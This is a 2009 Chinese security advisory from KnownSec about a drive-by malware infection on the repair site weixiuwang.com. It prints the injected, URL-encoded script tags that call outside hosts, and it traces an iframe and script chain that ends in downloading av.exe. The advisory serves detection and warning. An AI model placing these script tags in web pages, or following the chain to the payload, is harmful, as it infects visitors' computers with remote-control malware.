发布时间:Thu Nov 12 2009 19:39:22 UTC+0800
最后更新时间:Thu Nov 12 2009 19:39:22 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 中国维修网(http://www.weixiuwang.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.weixiuwang.com/

网页被嵌入恶意链接代码:
<script language=javascript src=http://vh%64.xor%67.%70l/c.js?google_ad=130×31_ad></script><script language=javascript src=http://vh%6A.xo%72g.%70l/c.js?google_ad=11×33_ad></script><script language=javascript src=http://360%62a.km%64dns.c%6Fm/c.js?google_ad=11×03_ad></script><script language=javascript src=http://n%63w.s%6Fv.%74w/c.js?google_ad=12×04_ad></script><script language=javascript src=http://vh%6B.xor%67.%70l/c.js?google_ad=11×07_ad></script><script language=javascript src=http://ne%63.xo%72g.%70l/c.js?google_ad=11×110_ad></script><script language=javascript src=http://ne%64.xo%72g.%70l/c.js?google_ad=11×210_ad></script><script language=javascript src=http://ne%66.xo%72g.%70l/c.js?google_ad=11×111_ad></script><script language=javascript src=http://ne%68.xo%72g.%70l/c.js?google_ad=11×112_ad></script>

挂马分析:
[root]http://www.weixiuwang.com/
    [iframe]http://www.weixiuwang.com/dy_download.asp
    [script]http://cpro.baidu.com/cpro/ui/cp.js
    [iframe]http://www.weixiuwang.com/dy_other.asp?urltype=1
    [iframe]http://www.weixiuwang.com/dy_other.asp?urltype=2
    [iframe]http://www.weixiuwang.com/dy_other.asp?urltype=3
    [script]http://searchbar.mainone.com/searchbar/search4.js
        [script]http://searchbar.mainone.com/searchbar/mainonefunction.js
        [iframe]http://union.b2b.cn/allymember/isusesearchbar.aspx?url=
        [exe]http://searchbar.mainone.com/searchbar/css.css
    [script]http://club.weixiuwang.com/dv_news.asp?getname=hottopic
        [script]http://vhj.xorg.pl/c.js?google_ad=11×33_ad
        [script]http://vhj.xorg.pl/c.js?google_ad=11×33_ad
        [script]http://360ba.kmddns.com/c.js?google_ad=11×03_ad
        [script]http://vhk.xorg.pl/c.js?google_ad=11×07_ad
        [script]http://nec.xorg.pl/c.js?google_ad=11×110_ad
        [script]http://ned.xorg.pl/c.js?google_ad=11×210_ad
        [script]http://nef.xorg.pl/c.js?google_ad=11×111_ad
        [script]http://neh.xorg.pl/c.js?google_ad=11×112_ad
        [script]http://photo.gog.com.cn/html/js/fs.js
        [script]http://photo.gog.com.cn/html/js/fs.js
    [script]http://vsh.xorg.pl/c.js?google_ad=1029×29_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
            [iframe]http://goi.nna.cc/66/at.htm
                [iframe]http://goi.nna.cc/66/mpie.htm
                    [script]http://goi.nna.cc/66/ll.jpg
                    [script]http://goi.nna.cc/66/ll1.jpg
                    [script]http://goi.nna.cc/66/lll.jpg
                        [exe]http://goi.nna.cc/h/av.exe
                    [script]http://goi.nna.cc/66/llll1.jpg
                    [script]http://goi.nna.cc/66/llll.jpg
                    [script]http://goi.nna.cc/66/lllll.jpg
                [iframe]http://goi.nna.cc/66/ofic.htm
                    [script]http://goi.nna.cc/66/ofic.swf
                        [exe]http://goi.nna.cc/h/av.exe
                [iframe]http://goi.nna.cc/66/al.htm
                    [iframe]http://goi.nna.cc/66/ofnt.htm
                        [script]http://goi.nna.cc/66/ofnt.swf
                            [exe]http://goi.nna.cc/h/av.exe
                    [iframe]http://goi.nna.cc/66/glz.htm
                        [script]http://goi.nna.cc/66/glz.swf
                        [script]http://goi.nna.cc/66/glzz.swf
                            [exe]http://goi.nna.cc/h/av.exe
            [script]http://goi.nna.cc/66/fa.js
                [iframe]http://goi.nna.cc/66/fa.htm
                    [iframe]http://goi.nna.cc/66/ff.html
                    [iframe]http://goi.nna.cc/66/ie.html
                    [iframe]http://goi.nna.cc/66/ff.html
                    [iframe]http://goi.nna.cc/66/ie.html
                    [iframe]http://goi.nna.cc/66/ff.html
                    [iframe]http://goi.nna.cc/66/ff.html
    [script]http://float2006.tq.cn/floatcard?

adminid=8154067&sort=0&where=
        [script]http://sysimages.tq.cn/js/tqhead.js
        [script]http://sysimages.tq.cn/js/tqdragandcommon.js
        [script]http://sysimages.tq.cn/js/tqfloatwin_agent.js
        [script]http://sysimages.tq.cn/js/tqxunwen_agent.js
    [script]http://vhd.xorg.pl/c.js?google_ad=130×31_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
    [script]http://vhj.xorg.pl/c.js?google_ad=11×33_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
    [script]http://360ba.kmddns.com/c.js?google_ad=11×03_ad
    [script]http://ncw.sov.tw/c.js?google_ad=12×04_ad
    [script]http://vhk.xorg.pl/c.js?google_ad=11×07_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
    [script]http://nec.xorg.pl/c.js?google_ad=11×110_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
    [script]http://ned.xorg.pl/c.js?google_ad=11×210_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
    [script]http://nef.xorg.pl/c.js?google_ad=11×111_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
    [script]http://neh.xorg.pl/c.js?google_ad=11×112_ad
        [iframe]http://goi.nna.cc/66/360sd.htm
最终下载病毒文件:
http://goi.nna.cc/h/av.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:10
Google对该网站的判定:恶意

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]